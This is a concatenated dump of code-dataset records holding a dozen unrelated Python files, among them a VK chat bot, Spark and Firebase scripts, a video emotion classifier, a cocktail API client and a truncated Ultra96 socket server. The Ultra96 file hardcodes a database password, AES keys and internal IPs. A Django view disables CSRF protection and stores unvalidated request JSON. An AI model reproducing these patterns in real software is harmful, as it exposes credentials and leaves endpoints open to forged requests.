trend_breaks.append(breaking_point)\n return str(min(trend_breaks))\n","sub_path":"components/collector/src/source_collectors/performancetest_runner.py","file_name":"performancetest_runner.py","file_ext":"py","file_size_in_byte":4642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"206248895","text":"from dutymanager.files.errors import VK_ERROR, CANT_BIND_CHAT\nfrom dutymanager.units.vk_script import get_chat, msg_edit\nfrom dutymanager.db.methods import AsyncDatabase\nfrom dutymanager.units.vk_script import msg_send\nfrom tortoise.exceptions import BaseORMException\nfrom dutymanager.units.utils import *\nfrom module import VKError, types\nfrom module.utils import logger\nfrom module import Blueprint\n\nbot = Blueprint(name=\"Base\")\ndb = AsyncDatabase.get_current()\n\n\n@bot.event.print_bookmark()\nasync def print_bookmark(event: types.PrintBookmark):\n peer_id = db.chats(event.object.chat)\n local_id = event.object.conversation_message_id\n description = event.object.description\n try:\n await msg_send(\n peer_id,\n f\"🔼 Перейти к закладке «{description}»\",\n local_id\n )\n except (IndexError, VKError) as e:\n e = list(e.args)[0]\n await send_msg(peer_id, VK_ERROR.get(e, \"❗ Произошла неизвестная ошибка.\"))\n\n\n@bot.event.ban_get_reason()\nasync def ban_get_reason(event: types.BanGetReason):\n peer_id = db.chats(event.object.chat)\n local_id = event.object.local_id\n try:\n await msg_send(peer_id, \"🔼 Перейти к месту бана\", local_id)\n except (IndexError, VKError) as e:\n e = list(e.args)[0]\n await send_msg(peer_id, VK_ERROR.get(e, \"❗ Произошла неизвестная ошибка.\"))\n\n\nasync def abstract_bind(\n uid: str, text: str, date: int, local_id: int\n):\n if uid not in db.chats:\n chat_id, title = await get_chat(date, text)\n return await db.chats.create(uid, chat_id, title[:250])\n await msg_edit(\n peer_id=db.chats(uid), local_id=local_id,\n message=f\"✅ Беседа «{db.chats(uid, 'title')}» распознана!\",\n )\n\n\n@bot.event.bind_chat()\nasync def bind_chat(event: types.BindChat):\n return await abstract_bind(\n event.object.chat,\n \"!связать\",\n event.message.date,\n event.message.conversation_message_id\n )\n\n\n@bot.event.subscribe_signals()\nasync def subscribe_signals(event: types.SubscribeSignals):\n uid = event.object.chat\n try:\n await abstract_bind(\n uid,\n event.object.text,\n event.message.date,\n event.message.conversation_message_id\n )\n await db.chats.change(uid, is_duty=True)\n except (BaseORMException, Exception) as e:\n logger.error(e)\n return {\"response\": \"error\", \"error_code\": CANT_BIND_CHAT}","sub_path":"dutymanager/plugins/base_events/base_events.py","file_name":"base_events.py","file_ext":"py","file_size_in_byte":2569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"193991724","text":"\nnumAxes = 3\ndoubleAxes = True\n#cutoffValues = [1,15,269]\naxisAssignRule = 'degree'\naxisPositRule = 'Gender'\ncolor = 'white'\n\n#edge styling\nedgeColorPalette = ['blue','red']\nedgeColorRule = 'relationship'\n\n#node styling\nnodeColorPalette = ['blue', 'red']\nnodeColorRule = 1\n\n#python scripts/main.py -n /Users/sperez/git/microbPLSA/MicrobProcessor/D3/hiveplots/Data/WL_Nodes_ALL.csv -e /Users/sperez/git/microbPLSA/MicrobProcessor/D3/hiveplots/Data/WL_EDGES_ALL.csv -t aria -d\n\n\n'''\n# Below are variables which would normally be inputer by the user.\n# For the sake of developing the script I have stored them here for convenience\n\nnumAxes = 3\ndoubleAxes = False\naxisAssignRule = 2\naxisPositRule = 'degree'\n\ncolor = 'green'\n\n#edge styling\nedgeColorPalette = ['blue', 'purple']\nedgeColorRule = 2 #'average connecting degree'\n\n\n#example command\n#python scripts/main.py -n tests/test_nodes_friends.csv -e tests/test_edges_friends.csv -t friends -d\n'''","sub_path":"tests/test_parameter_friends.py","file_name":"test_parameter_friends.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"566492985","text":"from logging import *\nfrom pyspark.sql import SparkSession\nfrom os.path import abspath\n# warehouse_location points to the default location for managed databases and tables\nwarehouse_location = abspath('spark-warehouse')\nsparkSessionObj = SparkSession \\\n .builder \\\n .appName(\"Python Spark SQL Hive integration example\") \\\n .config(\"spark.sql.warehouse.dir\", warehouse_location) \\\n .enableHiveSupport() \\\n .getOrCreate()\n\nlog =getLogger(\"jobLogger\")\nlog.info(\"Info message\")\nlog.error(\"Error message\")\n\n#sparkSessionObj.sql(\"create database if not exists rakesh\")\n#sparkSessionObj.sql(\"drop database if exists demo\")\nsparkSessionObj.sql(\"show databases\").show()\n#sparkSessionObj.sql(\"use demo\")\n#sparkSessionObj.sql(\"show databases\").show()\n#sparkSessionObj.sql(\"CREATE TABLE IF NOT EXISTS employee(id INT, name STRING, age INT) ROW FORMAT DELIMITED FIELDS TERMINATED BY ',' LINES TERMINATED BY '\\n'\")\n#sparkSessionObj .sql(\"CREATE TABLE src(key INT, value STRING) USING hive\")\n#sparkSessionObj .sql(\"show tables\").show()\n#spark.sql(\"LOAD DATA LOCAL INPATH 'examples/src/main/resources/kv1.txt' INTO TABLE src\")","sub_path":"PySpark/target/scala-2.13/classes/com/pyspark/ConnectToLocalHive.py","file_name":"ConnectToLocalHive.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"618727056","text":" #!/usr/bin/python\r\n\r\nfrom pymongo import MongoClient\r\nimport cgi\r\nimport json\r\nimport cgitb\r\nimport configparser\r\nfrom django.shortcuts import render\r\nfrom django.http import JsonResponse\r\nfrom django.views.decorators.csrf import csrf_exempt\r\n\r\ncgitb.enable()\r\nconfig = configparser.ConfigParser()\r\nconfig.read('/opt/python/current/app/mwfeeds/mwfeeds.cfg')\r\n\r\ndef index(req):\r\n c = {}\r\n owner = req.session['token']\r\n c[\"token\"] = owner\r\n if owner == \"\" or (\"meltwater.com\" not in owner and \"a3logics.in\" not in owner):\r\n c[\"subView\"] = \"Login.pyv\"\r\n else:\r\n c[\"activeurl\"] = config.get(\"active\", \"baseUrl\")\r\n c[\"subView\"] = \"CreateFeed.pyv\"\r\n return render(req, \"index.pyv\", c, content_type=\"text/html\")\r\n\r\n@csrf_exempt\r\ndef save(req):\r\n try:\r\n raw=req.body.decode(\"utf-8\")\r\n form = json.loads(raw)\r\n req.content_type = \"application/json\"\r\n client = MongoClient(config.get(\"active\", \"DBUrl\"))\r\n db = client.mwfeeds\r\n feedsCollection = db.feeds\r\n feedsCount = feedsCollection.count()\r\n outArray = form\r\n outArray[\"_id\"] = feedsCount\r\n feedsCollection.insert(outArray)\r\n return JsonResponse({\"success\": True, \"id\": feedsCount})\r\n except Exception as e:\r\n return JsonResponse({\"success\": False, \"message\": str(e)})\r\n\r\n\r\n\r\n","sub_path":"mwfeeds/controlers/CreateFeed.py","file_name":"CreateFeed.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"497716694","text":"import strax\nimport straxen\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom argparse import ArgumentParser\nimport argparse\nimport sys\nimport time\nimport cutax\n\nsys.path +=['../../../utils/']\n\nimport xomlib\n\n\ndef press_run(runid):\n print(runid)\n sc = straxen.SCADAInterface() \n parameters = {'Pcryo':'XE1T.CRY_PT101_PCHAMBER_AI.PI'}\n st = cutax.xenonnt_online(_rucio_local_path='/project/lgrandi/rucio', include_rucio_local = True)\n st.storage += [strax.DataDirectory('/project2/lgrandi/xenonnt/processed', provide_run_metadata=True)]\n# st = straxen.contexts.xenonnt_online()\n sc.context = st\n run_number = str(runid)\n dfbg = sc.get_scada_values(parameters, run_id= run_number, every_nth_value=1) \n data = dfbg.to_numpy()\n mean = np.mean(data)\n \n xomresult = xomlib.Xomresult(analysis_name=\"test_scada\",\n analysis_version = \"v0.0\",\n variable_name='XE1T.CRY_PT101_PCHAMBER_AI.PI',\n variable_value=mean,\n runid=runid\n )\n xomresult.save()\n time.sleep(20)\n xomresult.xom_message(success=True)\n\n # if(xom_saver(\"test_scada\",'XE1T.CRY_PT101_PCHAMBER_AI.PI',runid,mean, datatype=\"main\")):\n # xom_message(sucess=True)\n # else:\n # xom_message(sucess=False)\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"runid\",type=int,help='runid')\n args = parser.parse_args()\n print(args.runid)\n parser = ArgumentParser()\n\n press_run(args.runid)\n \nif __name__ == \"__main__\":\n main()\n\n","sub_path":"backend/algorithms/scada/test_scada.py","file_name":"test_scada.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"101241236","text":"import h5py as h5\nimport numpy as np\nimport pickle as pk\nimport matplotlib.pyplot as plt\nfrom sklearn.externals import joblib\n\nn_sample = 10000\ntop_ratio = 0.8867027097305438\ntop_num = int(n_sample*top_ratio)\neast_num = n_sample-top_num\ntop_flag = [1]*top_num+[0]*east_num\nnp.random.seed(5)\nnp.random.shuffle(top_flag)\ntop_flag = np.array(top_flag)\n\n\n# another way to decide qlx, qly\n# np.sum([len(np.where(start[0:10000, 1]+1e-8 == x)[0])\n# for x in np.arange(0, 451)])\n# np.sum([len(np.where(start[0:10000, 3]+1e-8 == x)[0])\n# for x in np.arange(90, 121, 0.5)])\n# xxx = ([np.where(start[0:10000, 3]+1e-8 == x)[0].tolist()\n# for x in np.arange(90, 121, 0.5)])\n# xxx = [x for y in xxx for x in y]\n# yyy = np.array([0]*10000)\n# yyy[xxx] = 1\n\n\ncase_dir = \"/mnt/e/rtd/Data/Simulation_Data/Output/base/\"\n#case_dir = \"/media/sf_e/rtd/Data/Simulation_Data/Output/smooth/\"\ncase_dir = \"/mnt/e/rtd/Data/Simulation_Data/Output/weekly/\"\n\nnnode = 10\nnrelease = 10000\nnloc = 10000\n\n\n# nnode = 1\n# nrelease = 1000\n# nloc = 10000\n\n\ntravel_time = np.empty(nrelease*nloc)\ntravel_dis = np.empty(nrelease*nloc)\nweight = np.empty(nrelease*nloc)\npt_status = np.empty(nrelease*nloc)\nrelease_time = np.empty(nrelease)\n\nindex_start = 0\nfor inode in range(nnode):\n print(inode)\n # hdf5 = h5.File(case_dir+str(inode)+\"/time.h5\", \"r\")\n # read data\n hdf5 = h5.File(case_dir+str(inode)+\"_time.h5\", \"r\")\n start = hdf5[\"start\"][:]\n end = hdf5[\"end\"][:]\n status = hdf5[\"status\"][:]\n flux = hdf5[\"flux\"][:]\n hdf5.close()\n\n # extract time information\n n_subset = len(status)\n index_end = index_start+n_subset\n sub_travel_time = end[:, 0]-start[:, 0]\n sub_travel_dis = ((end[:, 1]-start[:, 1])**2 +\n (end[:, 2]-start[:, 2])**2 +\n (end[:, 3]-start[:, 3])**2)**0.5\n sub_release_time = start[np.arange(0, n_subset, nloc), 0]\n release_material = start[np.arange(nloc), -2]\n release_loc = start[np.arange(nloc), 1:4]\n flux_op = np.transpose(\n np.tile(np.vstack((1-top_flag, top_flag)),\n int(n_subset/nloc)))\n sub_weight = np.sum(flux[:, [0, 2]]*flux_op, 1)\n# sub_weight[sub_weight >= 0] = np.nan\n# sub_weight[status == -3] = np.nan\n# sub_weight[status == -1] = np.nan\n# sub_weight = np.abs(sub_weight)\n\n # put in total array\n travel_time[index_start:index_end] = sub_travel_time\n travel_dis[index_start:index_end] = sub_travel_dis\n pt_status[index_start:index_end] = status\n weight[index_start:index_end] = sub_weight\n release_time[int(index_start/nloc):\n int(index_end/nloc)] = sub_release_time\n index_start = index_end\n\n# remote upwelling particles\ntravel_time = travel_time.reshape((-1, nloc), order=\"C\")\ntravel_dis = travel_dis.reshape((-1, nloc), order=\"C\")\nweight = weight.reshape((-1, nloc), order=\"C\")\npt_status = pt_status.reshape((-1, nloc), order=\"C\")\n\n# travel_time[np.isnan(weight)] = np.nan\n# travel_dis[np.isnan(weight)] = np.nan\n# sort array by release Y directions\n# loc_index = np.argsort(release_loc[:, 1])\n# travel_time = travel_time[:, loc_index]\n# pt_status = pt_status[:, loc_index]\n# weight = weight[:, loc_index]\n# release_material = release_material[loc_index]\n# release_loc = release_loc[loc_index, ]\n\n# form the dict\npk_dict = {\"travel_time\": travel_time,\n \"travel_dis\": travel_dis,\n \"weight\": weight,\n \"status\": pt_status,\n \"release_time\": release_time,\n \"release_loc\": release_loc,\n \"release_material\": release_material\n }\n\n# dump the file\nwith open(case_dir+\"rtd_raw.joblib\", \"wb\") as f:\n joblib.dump(pk_dict, f)\n\n\n# img_dir = \"/media/sf_e/rtd/Figures/\"\n# fig_name = img_dir + \"raw_rtd_contour_combind.png\"\n# fig = plt.figure()\n# ax3 = fig.add_subplot(111)\n# ax3.imshow(np.transpose(\n# np.log10(travel_time/24)),\n# aspect=1,\n# cmap=plt.cm.hot_r)\n# fig.savefig(fig_name, dpi=600, transparent=False)\n# plt.close(fig)\n\n\n# n_active = [len(np.where(~np.isnan(weight[i, :]))[0]) for i in range(nrelease)]\n# img_dir = \"/media/sf_e/rtd/Figures/\"\n# fig_name = img_dir + \"raw_rtd_weight_num.png\"\n# fig = plt.figure()\n# ax3 = fig.add_subplot(111)\n# ax3.scatter(release_time, n_active, s=0.01)\n# fig.savefig(fig_name, dpi=600, transparent=False)\n# plt.close(fig)\n","sub_path":"1.6km/5_statistics/rtd_raw.py","file_name":"rtd_raw.py","file_ext":"py","file_size_in_byte":4324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"361364029","text":"from django.core.validators import RegexValidator\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.contrib.sites.models import Site\nfrom django.utils.http import urlsafe_base64_encode\nfrom django.utils.encoding import force_bytes\n\n\nclass RegexValidatorCommon(object):\n @staticmethod\n def phone():\n return RegexValidator(r'^[\\+]?[0-9]+$', _('only characters, 0-9'))\n\n\nclass ManagerAccount(object):\n @staticmethod\n def get_url_account_activate(user, token):\n domain = Site.objects.get(name='frontend_account')\n url = \"http://{}/{}/{}\".format(domain, urlsafe_base64_encode(force_bytes(user.pk)), token)\n return url\n\n\nclass General(object):\n @staticmethod\n def get_code_number(ind='x'):\n number = 100\n return format(id(number), ind)\n\n\n","sub_path":"omni/general_class.py","file_name":"general_class.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"279740693","text":"# -*- coding: utf-8 -*-\nimport os, sys\nimport cv2\nimport random\nimport numpy as np\nfrom tqdm import tqdm\nimport pickle\n\nsys.path.append('../')\nfrom pytorch.common.datasets_parsers.av_parser import AVDBParser\n\nfrom sklearn import svm\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import ExtraTreesClassifier\nfrom sklearn.decomposition import PCA\nfrom accuracy import Accuracy\n\n\ndef get_data(dataset_root, file_list, max_num_clips=0, max_num_samples=50):\n dataset_parser = AVDBParser(dataset_root, os.path.join(dataset_root, file_list),\n max_num_clips=max_num_clips, max_num_samples=max_num_samples,\n ungroup=False, load_image=True)\n data = dataset_parser.get_data()\n print('clips count:', len(data))\n print('frames count:', dataset_parser.get_dataset_size())\n return data\n\ndef calc_features(data):\n orb = cv2.ORB_create()\n\n progresser = tqdm(iterable=range(0, len(data)),\n desc='calc video features',\n total=len(data),\n unit='files')\n\n feat, targets = [], []\n for i in progresser:\n clip = data[i]\n\n # Cпособы вычисления признаков по изображению с использованием ключевых точек\n # используйте библиотеку OpenCV\n if 0: # distance between landmarks\n for sample in clip.data_samples:\n dist = []\n lm_ref = sample.landmarks[30] # point on the nose\n for j in range(len(sample.landmarks)):\n lm = sample.landmarks[j]\n dist.append(np.sqrt((lm_ref[0] - lm[0]) ** 2 + (lm_ref[1] - lm[1]) ** 2))\n feat.append(dist)\n targets.append(sample.labels)\n elif 1: # descriptors of landmarks\n rm_list = []\n for sample in clip.data_samples:\n # make image border\n bordersize = 15\n border = cv2.copyMakeBorder(sample.image, top=bordersize, bottom=bordersize, left=bordersize, right=bordersize,\n borderType=cv2.BORDER_CONSTANT, value=[0]*3)\n\n # make keypoint list\n keypoints = []\n for k in range(18, 68):\n keypoints.append(cv2.KeyPoint(x=sample.landmarks[k][0]+bordersize,\n y=sample.landmarks[k][1]+bordersize,\n _size=128))\n\n # compute the descriptors with ORB\n keypoints_actual, descriptors = orb.compute(border, keypoints)\n if len(keypoints_actual) != len(keypoints):\n rm_list.append(sample)\n continue\n\n descriptors = np.concatenate(descriptors)\n feat.append(descriptors)\n targets.append(sample.labels)\n\n for sample in rm_list:\n clip.data_samples.remove(sample)\n else:\n rm_list = []\n for j in range(len(clip.data_samples)):\n VolData = []\n target_blob = []\n bordersize = 25\n for k in range(-2, 3):\n t = min(max(0, j+k), len(clip.data_samples)-1)\n gray_img = cv2.cvtColor(clip.data_samples[t].image, cv2.COLOR_BGR2GRAY)\n # make image border\n gray_img = cv2.copyMakeBorder(gray_img, top=bordersize, bottom=bordersize, left=bordersize,\n right=bordersize,\n borderType=cv2.BORDER_CONSTANT, value=[0] * 3)\n VolData.append(gray_img)\n target_blob.append(clip.data_samples[t].labels)\n try:\n feat.append(get_LBPTOP(np.asarray(VolData).transpose(1,2,0), clip.data_samples[j].landmarks[18:68], bordersize))\n targets.append(np.median(target_blob))\n except:\n rm_list.append(clip.data_samples[j])\n\n for sample in rm_list:\n clip.data_samples.remove(sample)\n\n print('feat count:', len(feat))\n return np.asarray(feat, dtype=np.float32), np.asarray(targets, dtype=np.float32)\n\ndef classification(X_train, X_test, y_train, y_test, accuracy_fn, pca_dim):\n if pca_dim > 0:\n pass\n # TODO: выполните сокращение размерности признаков с использованием PCA\n\n # shuffle\n combined = list(zip(X_train, y_train))\n #random.shuffle(combined)\n X_train[:], y_train[:] = zip(*combined)\n\n # Классификаторы из sklearn\n classifiers = []\n classifiers.append(RandomForestClassifier(n_estimators=150, max_depth=50))\n #classifiers.append(svm.SVC(kernel='linear', gamma=5.0, C=150))\n\n for clf in classifiers:\n print(clf)\n y_pred = clf.fit(X_train, y_train).predict(X_test)\n accuracy_fn.by_frames(y_pred)\n accuracy_fn.by_clips(y_pred)\n\n\nif __name__ == \"__main__\":\n experiment_name = 'exp_1'\n max_num_clips = 0 # загружайте только часть данных для отладки кода\n use_dump = False # используйте dump для быстрой загрузки рассчитанных фич из файла\n\n # dataset dir\n base_dir = '/media/olga/Data/Yandex_Disk/school_ML/DATABASES'\n if 1:\n train_dataset_root = base_dir + '/Ryerson/Video'\n train_file_list = base_dir + '/Ryerson/train_data_with_landmarks.txt'\n test_dataset_root = base_dir + '/Ryerson/Video'\n test_file_list = base_dir + '/Ryerson/test_data_with_landmarks.txt'\n elif 1:\n train_dataset_root = base_dir + '/OMGEmotionChallenge-master/omg_TrainVideos/preproc/frames'\n train_file_list = base_dir + '/OMGEmotionChallenge-master/omg_TrainVideos/preproc/train_data_with_landmarks.txt'\n test_dataset_root =base_dir + '/OMGEmotionChallenge-master/omg_ValidVideos/preproc/frames'\n test_file_list = base_dir + '/OMGEmotionChallenge-master/omg_ValidVideos/preproc/valid_data_with_landmarks.txt'\n\n if not use_dump:\n # load dataset\n train_data = get_data(train_dataset_root, train_file_list, max_num_clips=0)\n test_data = get_data(test_dataset_root, test_file_list, max_num_clips=0)\n\n # get features\n train_feat, train_targets = calc_features(train_data)\n test_feat, test_targets = calc_features(test_data)\n\n accuracy_fn = Accuracy(test_data, experiment_name=experiment_name)\n\n #with open(experiment_name + '.pickle', 'wb') as f:\n # pickle.dump([train_feat, train_targets, test_feat, test_targets, accuracy_fn], f, protocol=2)\n else:\n with open(experiment_name + '.pickle', 'rb') as f:\n train_feat, train_targets, test_feat, test_targets, accuracy_fn = pickle.load(f)\n\n # run classifiers\n classification(train_feat, test_feat, train_targets, test_targets, accuracy_fn=accuracy_fn, pca_dim=100)","sub_path":"video_feature_classification/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"104017077","text":"import pandas as pd\r\nimport firebase_admin\r\nfrom firebase_admin import credentials\r\nfrom firebase_admin import firestore\r\n#路徑是放Json檔的位置\r\ncred = credentials.Certificate(\"D:/ETTT/ICRSS/serviceAccountKey.json\")\r\n#initialize是初始化的意思\r\nif (not len(firebase_admin._apps)):\r\n firebase_admin.initialize_app(cred)\r\n'''\r\n 初始化firebase,注意不能重複初始化\r\n 初始化firestore \r\n'''\r\ndb = firestore.client()\r\n# ranks是一個集合,在其底下的叫 文件,並存於變數 collection_name\r\n\r\nranks_list=[]\r\ncol_list=[]\r\nuid_list=[]\r\n#path_2 表示要取得的 文件名稱\r\n#這裡代表是 ranks 的文件\r\npath_2 =\"ranks\"\r\n#db.collection(文件名稱),取得 ranks 的內容並存於變數 collection_ref\r\n#.stream()方法類似 .get(),取得collection_ref的資料\r\ncollection_ref = db.collection(path_2)\r\ndocs = collection_ref.stream()\r\ntry:\r\n for doc in docs:\r\n ranks_list.append(doc.to_dict())\r\n uid_list.append(doc.to_dict()[\"uid\"])\r\nexcept:\r\n print(\"指定文件的路徑{}不存在,請檢查路徑是否正確\".format(path_2)) \r\nfor i in ranks_list:\r\n# 因為店家跟商品是分開的,所以先把他們串起來後丟到col_list裡面\r\n col_list.append(i.get('store')+'|'+i.get('item')) \r\n#pd.unique()方法是排除掉重複值,因為1個使用者可以有多個品項的評分\r\nuid_uni =pd.unique(pd.Series(uid_list))\r\ncol_uni =pd.unique(pd.Series(col_list))\r\n#建立新的DataFrame叫做rating_df,並設定列跟行的名稱\r\nrating_df=pd.DataFrame(columns=uid_uni,index=col_uni)\r\n#這裡的i一樣是代表每個dict\r\nfor i in ranks_list:\r\n store_item=i.get('store')+'|'+i.get('item')\r\n rating_df[i['uid']][store_item]=i['rank']\r\nrating_df.to_csv('get_firestore_rating.csv',encoding=\"utf_8_sig\")","sub_path":"get_firsebase_to_csv.py","file_name":"get_firsebase_to_csv.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"497353654","text":"import json, requests\nfrom PIL import Image\nimport matplotlib.pyplot as plt\n\n# api functions to provide information from www.thecocktaildb.com \n# base url for the cocktail api\nURL_BASE = \"https://www.thecocktaildb.com/api/json/v1/1/\"\nSEARCH = r\"search.php?s=\"\n\ndef get_json_response(url):\n # use base url and additional url arguments provided\n response = requests.get(URL_BASE + url)\n if response.status_code == 200:\n response_json = json.loads(response.content)\n if response_json:\n # if the response is good, return the json as a dict object\n return response_json\n else:\n return False\n else:\n return False\n\ndef show_cocktail(cocktail_json):\n # get image of drink from api and use matplotlib to show it\n response = requests.get(cocktail_json[\"drinks\"][0][\"strDrinkThumb\"], stream=True)\n img = Image.open(response.raw)\n plt.imshow(img)\n plt.show()\n\ndef define(search):\n replys = []\n # search the api for the given cocktail\n define_url = SEARCH + search\n response = get_json_response(define_url)\n if response != False:\n # show the cocktail image if a reponse if given\n show_cocktail(response)\n replys.append(\"Here is a {}!\".format(search))\n else:\n replys.append(\"I can't find {}\".format(search))\n\n return replys\n\ndef recipe(search):\n replys = []\n # gets the recipe for the given cocktail\n recipe_url = SEARCH + search\n response = get_json_response(recipe_url)\n if response != False:\n replys.append(response[\"drinks\"][0][\"strInstructions\"])\n else:\n replys.append(\"I can't find {}\".format(search))\n\n return replys\n\ndef glass(search):\n replys = []\n # gets the glass for the given cocktail\n glass_url = SEARCH + search\n response = get_json_response(glass_url)\n if response != False:\n replys.append(response[\"drinks\"][0][\"strGlass\"])\n else:\n replys.append(\"Sorry I cant find the glass used for {}\".format(search))\n\n return replys\n\ndef ingredients(search):\n replys = []\n ingredients_url = SEARCH + search\n response = get_json_response(ingredients_url)\n if response != False:\n drink = response[\"drinks\"][0]\n # lists of all ingredients \n ingredients = []\n ingredients.append(drink[\"strIngredient1\"])\n ingredients.append(drink[\"strIngredient2\"])\n ingredients.append(drink[\"strIngredient3\"])\n ingredients.append(drink[\"strIngredient4\"])\n ingredients.append(drink[\"strIngredient5\"])\n ingredients.append(drink[\"strIngredient6\"])\n ingredients.append(drink[\"strIngredient7\"])\n ingredients.append(drink[\"strIngredient8\"])\n # lists of all ingredients measures\n ingredient_measures = []\n ingredient_measures.append(drink[\"strMeasure1\"])\n ingredient_measures.append(drink[\"strMeasure2\"])\n ingredient_measures.append(drink[\"strMeasure3\"])\n ingredient_measures.append(drink[\"strMeasure4\"])\n ingredient_measures.append(drink[\"strMeasure5\"])\n ingredient_measures.append(drink[\"strMeasure6\"])\n ingredient_measures.append(drink[\"strMeasure7\"])\n ingredient_measures.append(drink[\"strMeasure8\"])\n # iterate the ingredients\n for x in range(8):\n # if ingredient is present, print it\n if ingredients[x] != None:\n # some ingredient have a measure, some are un measured\n if ingredient_measures[x] != None:\n replys.append(ingredient_measures[x] + ingredients[x])\n else:\n replys.append(ingredients[x])\n else:\n replys.append(\"Can't find the ingredients for {}\".format(search))\n\n return replys\n\ndef random():\n # use random api for to get random cocktail\n replys = []\n rand_url = r\"random.php\"\n response = get_json_response(rand_url)\n if response != False:\n replys.append(\"I reccomend a \" + response[\"drinks\"][0][\"strDrink\"] + \" , Here is a picture!\")\n show_cocktail(response)\n else:\n replys.append(\"Sorry I cant find a random cocktail!\")\n\n return replys\n","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":4168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"568508109","text":"import sys\nimport socket\nimport threading\nimport random\nimport base64\nimport time\nfrom math import floor\nfrom Crypto.Cipher import AES\nfrom Crypto import Random\nfrom threading import Thread\nfrom queue import Queue\nfrom collections import deque\nfrom features_fpga import get_features\nfrom MLP_predict_fpga import MLP_predict\nfrom MLP_predict_fpga import MLP_start\n\n# imports for SQL\nimport mysql.connector\nimport sshtunnel\nimport pymysql\nimport paramiko\nimport pandas as pd\nfrom paramiko import SSHClient\nfrom sshtunnel import SSHTunnelForwarder\nfrom os.path import expanduser\n\n### this runs on the ultra96 and connects to the eval_server\n\nGROUP_ID = 18\nSECRET_KEY = \"abcdefghijklmnop\"\nLAPTOP_ULTRA96_SECRET_KEY = \"abcdefghijklmnop\"\n\nDUMMY_DATA = ['zigzag', 'rocket', 'hair', 'logout']\n\n# create a socket connection to each of the dancer's laptops\nLAPTOP_IP = ['192.168.1.73'] \nMAX_LAPTOP_CONNECTIONS = 12; #3\nBLUNO_PER_LAPTOP = 1;\n\nPREDICTION_MAP = {\n 0 : \"hair\",\n 1 : \"rocket\",\n 2 : \"zigzag\",\n 3 : \"No move\"\n}\n\nPREDICTION_MAP_SQL = {\n 0 : \"HAIR\",\n 1 : \"ROCKET\",\n 2 : \"ZIGZAG\",\n 3 : \"NO MOVE\",\n 4 : \"WINDOWS\",\n 5 : \"PUSHBACK\",\n 6 : \"ELBOW_LOCK\",\n 7 : \"SCARECROW\",\n 8 : \"SHOULDER_SHRUG\"\n}\nPREDICTION_COUNT = {\n 0 : 0,\n 1 : 0,\n 2 : 0,\n 3 : 0\n}\n\nPREDICTION_THRESHOLD = 10 # once this many same predictions are made, sent to eval server\n'''\nSet this to True when attempting to connect to evaluation server\n'''\nCONNECT_TO_EVAL_SERVER = False\n\n'''\nSet this to True if you want to send data to sql database\n'''\nCONNECT_TO_SQL_DATABASE = False\n\n'''\nConnection to SQL Database\n'''\nsql_hostname = 'localhost'\nsql_username = 'capstone'\nsql_password = 'CG4002Weiyang1997!'\nsql_main_database = 'CG4002'\nsql_port = 3306\nssh_host = 'little_peter'\n\nssh_user = 'little-peter'\nssh_port = 22\nsql_ip = 'localhost'\nssh_address = '172.25.107.67'\nWEI_YANG_IP = '172.25.100.23'\n\nFILE_WRITE_START_TIME = 0\nFILE_WRITE_END_TIME = 0\nDATA_COLLECTION_MODE = False\n\n\nclass Ultra96_client(Thread):\n def __init__(self, ip_addr, port_num):\n super(Ultra96_client, self).__init__()\n self.shutdown = threading.Event()\n\n # synchronization data structures for laptop <=> ultra96\n self.laptop_data_queue = deque()\n self.laptop_data_map = {}\n self.laptop_data_map[0] = deque()\n self.laptop_data_map[1] = deque()\n self.laptop_data_map[2] = deque()\n\n self.laptop_positional_data_map = {}\n self.laptop_positional_data_map[0] = deque()\n self.laptop_positional_data_map[1] = deque()\n self.laptop_positional_data_map[2] = deque()\n\n # connect to the laptops\n self.init_connections_to_laptops()\n\n # just block. Find some condition for this such as after sending the logout action\n while True:\n time.sleep(5)\n\n \"\"\"\n Terminates the programme after necessary communications with\n Ultra96 have been done\n \"\"\"\n self.stop() \n\n def init_connections_to_laptops(self):\n print(\"Ultra96 server is starting up to receive connections from 3 dancer laptops\")\n self.xilinx_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.xilinx_ip_addr = \"137.132.86.241\"\n self.xilinx_socket.bind((self.xilinx_ip_addr, 14899))\n self.xilinx_socket.listen(12)\n\n # I'm accepting connections from 3 laptops only\n laptop_connection_counter = 0;\n while True:\n laptop_socket, laptop_address = self.xilinx_socket.accept()\n laptop_socket.settimeout(20)\n print(f\"Connection from {laptop_address} has been established\");\n if DATA_COLLECTION_MODE:\n print(\"Data collection is starting now\")\n FILE_WRITE_START_TIME = time.time()\n FILE_WRITE_END_TIME = time.time() + 60 * 3\n # spawn a file writer thread\n laptop_connection_counter += 1\n self.laptop1_connected_timing = time.time()\n if laptop_connection_counter <= MAX_LAPTOP_CONNECTIONS:\n # spawn 1 thread for the each connection\n thread = Thread(target=self.receive_data_from_laptop, args=(laptop_connection_counter, laptop_socket, laptop_address))\n thread.daemon=True\n thread.start()\n if laptop_connection_counter == 